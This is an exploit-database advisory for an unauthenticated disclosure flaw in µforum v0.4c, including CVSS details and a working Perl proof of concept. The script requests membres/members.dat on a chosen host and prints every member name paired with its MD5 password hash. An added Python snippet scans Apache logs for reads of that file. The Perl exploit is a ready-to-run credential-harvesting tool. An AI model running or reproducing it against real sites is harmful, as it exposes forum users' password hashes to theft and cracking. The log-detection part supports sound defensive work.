µforum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc

2006.09.08
Credit: DarkFig
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

#!/usr/bin/perl
#
# Affected.scr..: µforum v0.4c
# Poc.ID........: 08060901
# Type..........: Member's passwords are stored in .dat file not protected by a .htaccess file
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Src.download..: comscripts.com/scripts/php.forum.1568.html
# Poc.link......: acid-root.new.fr/poc/08060901.txt
# Credits.......: DarkFig
#
use LWP::UserAgent;
use HTTP::Request;
use Getopt::Long;
use strict;

print STDOUT "\n+", '-' x 36, "+\n";
print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";
print STDOUT '+', '-' x 36, "+\n";

# Command-line options: target host and forum path, optional HTTP proxy
my($host,$path,$proxh,$proxu,$proxp);
my $opt = GetOptions(
    'host=s'  => \$host,
    'path=s'  => \$path,
    'proxh=s' => \$proxh,
    'proxu=s' => \$proxu,
    'proxp=s' => \$proxp);

# The member database sits at a fixed location under the forum directory
if(!$path) {$path = '/';}
$host .= $path.'membres/members.dat';
if($host !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();
$ua->agent('Mozilla');
$ua->timeout(30);
$ua->proxy(['http'] => $proxh) if $proxh;

# Plain unauthenticated GET of the data file
my $req = HTTP::Request->new('GET', $host);
$req->proxy_authorization_basic($proxu, $proxp) if $proxp;
my $res = $ua->request($req);
my $dat = $res->content;

# Split the file on ':' and print each quoted name followed by its
# 32-character hash as name::hash
my @tabl= split(/:/, $dat);
foreach (@tabl) {
    if($_ =~ /"(.*)";a/){ print "\n".$1.'::';}
    if($_ =~ /"([a-z0-9]{32})";i/){ print $1;}
}
print "\n";
exit(0);
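
Added example (not part of the original advisory or the PoC author's code): a log check for past reads of the exposed file, using the membres/members.dat path and the bare "Mozilla" User-Agent that the PoC above sends. It assumes Apache "combined" format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format (assumed; adjust if the server logs differently).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

DATA_FILE = "/membres/members.dat"  # path requested by the PoC on this page


def find_member_file_reads(lines):
    """Return one record per request that targeted the member data file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry
        # Normalise: drop the query string, decode %xx, fold case and '//'.
        path = unquote(urlsplit(m["target"]).path).lower()
        path = re.sub(r"/+", "/", path)
        if not path.endswith(DATA_FILE):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": status,
            # A 200/206 with a body means the hashes left the server.
            "disclosed": status in (200, 206) and m["size"] not in ("-", "0"),
            # The PoC sets its User-Agent to the bare string "Mozilla".
            "poc_agent": m["ua"] == "Mozilla",
        })
    return hits


# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Sep/2006:10:12:01 +0200] "GET /forum/membres/members.dat HTTP/1.1" 200 1834 "-" "Mozilla"',
    '198.51.100.4 - - [08/Sep/2006:10:15:44 +0200] "GET /forum/membres/members%2Edat?x=1 HTTP/1.1" 403 199 "-" "curl/7.15"',
    '192.0.2.10 - - [08/Sep/2006:10:16:02 +0200] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11)"',
]

if __name__ == "__main__":
    for hit in find_member_file_reads(SAMPLE_LOG):
        print(hit)
```

Any record with "disclosed" set means the stored hashes should be treated as exposed and member passwords reset; 403 or 404 records show the file was requested after access was blocked.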


Copyright 2024, cxsecurity.com

 
